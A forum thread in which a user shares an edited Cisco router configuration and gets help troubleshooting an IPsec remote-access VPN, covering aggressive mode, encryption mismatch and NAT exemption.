i'm having issues with my VPN setup and i get booted by the client it seems? (P.S. This is off a cisco rtr) this is my config, edited of course :)


!
!
version 12.4
no service pad
service tcp-keepalives-in
service tcp-keepalives-out
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
service sequence-numbers
!
hostname JellyJam
!
boot-start-marker
boot-end-marker
!
logging count
logging buffered 16384
no logging rate-limit
!
aaa new-model
!
!
aaa authentication login default local
aaa authentication login gangaskanvpn local
aaa authorization exec default local
aaa authorization network gangaskanvpn local
!
!
aaa session-id common
!
!
!
dot11 syslog
!
dot11 ssid gangaskan
vlan 1
authentication open
authentication key-management wpa
guest-mode
wpa-psk ascii 7 031753021C032442471303091243
!
no ip source-route
no ip dhcp use vrf connected
ip dhcp excluded-address 10.10.10.1
ip dhcp excluded-address 192.168.1.1 192.168.1.99
!
ip dhcp pool Internal-net
import all
network 192.168.1.0 255.255.255.0
default-router 192.168.1.1
domain-name neo.rr.com
lease 4
!
!
ip cef
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
no ip bootp server
ip domain name dyndns.ws
ip name-server 208.67.222.222
ip name-server 208.67.220.220
ip ddns update method test
!
!
parameter-map type protocol-info msn-servers
server name messenger.hotmail.com
server name gateway.messenger.hotmail.com
server name webmessenger.msn.com

parameter-map type protocol-info aol-servers
server name login.oscar.aol.com
server name toc.oscar.aol.com
server name oam-d09a.blue.aol.com

parameter-map type protocol-info yahoo-servers
server name scs.msg.yahoo.com
server name scsa.msg.yahoo.com
server name scsb.msg.yahoo.com
server name scsc.msg.yahoo.com
server name scsd.msg.yahoo.com
server name cs16.msg.dcn.yahoo.com
server name cs19.msg.dcn.yahoo.com
server name cs42.msg.dcn.yahoo.com
server name cs53.msg.dcn.yahoo.com
server name cs54.msg.dcn.yahoo.com
server name ads1.vip.scd.yahoo.com
server name radio1.launch.vip.dal.yahoo.com
server name in1.msg.vip.re2.yahoo.com
server name data1.my.vip.sc5.yahoo.com
server name address1.pim.vip.mud.yahoo.com
server name edit.messenger.yahoo.com
server name messenger.yahoo.com
server name http.pager.yahoo.com
server name privacy.yahoo.com
server name csa.yahoo.com
server name csb.yahoo.com
server name csc.yahoo.com
!
!
!
!
crypto isakmp policy 1
encr 3des
hash md5
authentication pre-share
group 5
!
crypto isakmp client configuration group VPN
key 123
domain gangaskan.dyndns.ws
pool ippool
!
!
crypto ipsec transform-set espresso esp-aes esp-sha-hmac
!
!
!
crypto dynamic-map dynamicmap 10
set transform-set espresso
reverse-route
!
!
crypto map clientmap client authentication list gangaskanvpn
crypto map clientmap isakmp authorization list gangaskanvpn
crypto map clientmap 10 ipsec-isakmp dynamic dynamicmap
!
crypto ctcp port 10000
archive
log config
hidekeys
!
!
ip tcp synwait-time 10
!
bridge irb
!
!
interface FastEthernet0
spanning-tree portfast
!
interface FastEthernet1
spanning-tree portfast
!
interface FastEthernet2
spanning-tree portfast
!
interface FastEthernet3
spanning-tree portfast
!
interface FastEthernet4
ip dhcp client update dns server none
ip ddns update hostname gangaskan.dyndns.ws
ip ddns update test
ip address dhcp
no ip redirects
no ip unreachables
no ip proxy-arp
ip nat outside
ip virtual-reassembly
ip tcp adjust-mss 1460
duplex auto
speed auto
no cdp enable
crypto map clientmap
!
!
interface Dot11Radio0
no ip address
no dot11 extension aironet
!
encryption vlan 1 mode ciphers tkip
!
ssid gangaskan
!
speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0
station-role root
no cdp enable
!
interface Dot11Radio0.1
encapsulation dot1Q 1 native
no cdp enable
bridge-group 1
bridge-group 1 subscriber-loop-control
bridge-group 1 spanning-disabled
bridge-group 1 block-unknown-source
no bridge-group 1 source-learning
no bridge-group 1 unicast-flooding
!
interface Vlan1
description Internal Network
ip address 10.10.10.1 255.255.255.248
ip nat inside
ip virtual-reassembly
ip tcp adjust-mss 1452
bridge-group 1
bridge-group 1 spanning-disabled
!
interface BVI1
description Bridge to Internal Network
ip address 192.168.1.1 255.255.255.0
ip directed-broadcast
ip nat inside
ip virtual-reassembly
!
ip local pool ippool 192.168.1.60 192.168.1.70
ip forward-protocol nd
ip route 0.0.0.0 0.0.0.0 dhcp
ip flow-top-talkers
top 5
sort-by bytes
!
!
!
logging facility local6
logging source-interface Dot11Radio0
logging 192.168.1.50
no cdp run
!
control-plane
!
bridge 1 route ip
banner exec ^C-----------------------------------------------------------------------

Gangaskan's Router, Unauthorized access must disconnect now!

-----------------------------------------------------------------------
^C
banner login ^C
-----------------------------------------------------------------------


Gangaskan's Router, Unauthorized access must disconnect now.


-----------------------------------------------------------------------
^C
!
line con 0
logging synchronous level all
no modem enable
transport output telnet
line aux 0
transport output telnet
line vty 0 4
logging synchronous level all
transport input ssh
!
scheduler max-task-time 5000
scheduler allocate 4000 1000
scheduler interval 500
sntp server 98.172.32.171
end



in terms of dynamic ISAKMP it looks like i have this setup the right way, however, it dosent look like it. when i connect, i get the error

%CRYPTO-6-IKMP_MODE_FAILURE: Processing of Aggressive mode failed with peer

how do either turn off agressive mode on the vpn server or client?

edit: or is it best practices to keep agressive mode on with the vpn server? or what do i need in order to set this up right? i know i'm missing something. PS i'm using group auth with the cisco VPN client

I'm not 100% familiar with the Cisco VPN client, but I do know you'll need have Aggressive Mode enabled on both the VPN Server and Client. An aggressive mode VPN is necessary because the VPN Server does not know where the VPN Client is. The Aggressive Mode Tunnel sends out the two peer ID's unencrypted, but overall should not compromise the security of the VPN tunnel.

Also, take a look here: http://www.velocityreviews.com/forums/showpost.php?p=185062&postcount=2. This should help you out. Good hunting!

I'm not 100% familiar with the Cisco VPN client, but I do know you'll need have Aggressive Mode enabled on both the VPN Server and Client. An aggressive mode VPN is necessary because the VPN Server does not know where the VPN Client is. The Aggressive Mode Tunnel sends out the two peer ID's unencrypted, but overall should not compromise the security of the VPN tunnel.

Also, take a look here: http://www.velocityreviews.com/forums/showpost.php?p=185062&postcount=2. This should help you out. Good hunting!

i'll check that post out thanks dark :)

also, i had my teacher look at it, my config was ok, but my client was trying to auth with DES not 3des or AES

got it to work, but nothing is being routed through the tunnel, so i have to look at that.

ahem... COUGH ****lenizzle1

i'll check that post out thanks dark :)

also, i had my teacher look at it, my config was ok, but my client was trying to auth with DES not 3des or AES

got it to work, but nothing is being routed through the tunnel, so i have to look at that.

you are missing your nat statements.
you need to nat exempt the inside network to the inside network.

i do my vpn setups using ASDM (or SDM in your case)
ive configured ipsec vpn once manually, and that was on a course. i'll be studying for that exam in january.

also if you use split-tunneling, your client will only send traffic destined for the other network over the vpn tunnel. that way, you can access the internet locally.
if you didnt do that, then all traffic, including internet will be downloaded at home or wherever the cisco router is, and then uploaded to you (the client) and vice versa.

you are missing your nat statements.
you need to nat exempt the inside network to the inside network.

i do my vpn setups using ASDM (or SDM in your case)
ive configured ipsec vpn once manually, and that was on a course. i'll be studying for that exam in january.

also if you use split-tunneling, your client will only send traffic destined for the other network over the vpn tunnel. that way, you can access the internet locally.
if you didnt do that, then all traffic, including internet will be downloaded at home or wherever the cisco router is, and then uploaded to you (the client) and vice versa.

erm, how do i nat exempt the inside vpn trafic? this is the first time i've setup a tunnel, and its been forever since my ccna stuff :P

i have an updated config, i changed some things around, but i'd perfer to stay command line ;) the SDM just makes garbage in the config, i had to pull alot of crap out

the SDM just makes garbage in the config, i had to pull alot of crap out

yea your right about that.

gimme a little while, i have a 2811 here. i dont know the commands off the top of my head.

an ASA on ASDM would use this

access-list inside_nat0_outbound remark no nat for vpn
access-list inside_nat0_outbound extended permit ip 192.168.1.0 255.255.255.0 192.168.1.0 255.255.255.0
nat (inside) 0 access-list inside_nat0_outbound


but im pretty sure you can just use:
nat (inside) 0 192.168.1.0 255.255.255.0 192.168.1.0 255.255.255.0

however, routers use wildcard masks instead of subnet masks,

so yours might be:
ip nat (*inside int name*) 0 192.168.1.0 0.0.0.255 192.168.1.0 0.0.0.255

try typing it in, and pressing ? to list the available options after each word. :)

remember when you use the vpn, you appear on the inside of the network, but you are really on the outside.
this is why you cannot tftp the config off, over a vpn*, because what happens is the firewall / router gets confused on how to send the traffic, and sources the config from the outside interface.

*if you want to tftp the config off, you need to finish the cmd line by adding :int-inside or something like that, to source it from the inside interface :) that way it gets tunneled.

i think i figured it out perhaps, i dont have time to test, but i will lat lunch!


followed a cisco guide here (http://www.cisco.com/en/US/tech/tk583/tk372/technologies_configuration_example09186a00800949db .shtml) so hope that works!

schweet! i was right about the NAT then, except my config was way off! lol
sorry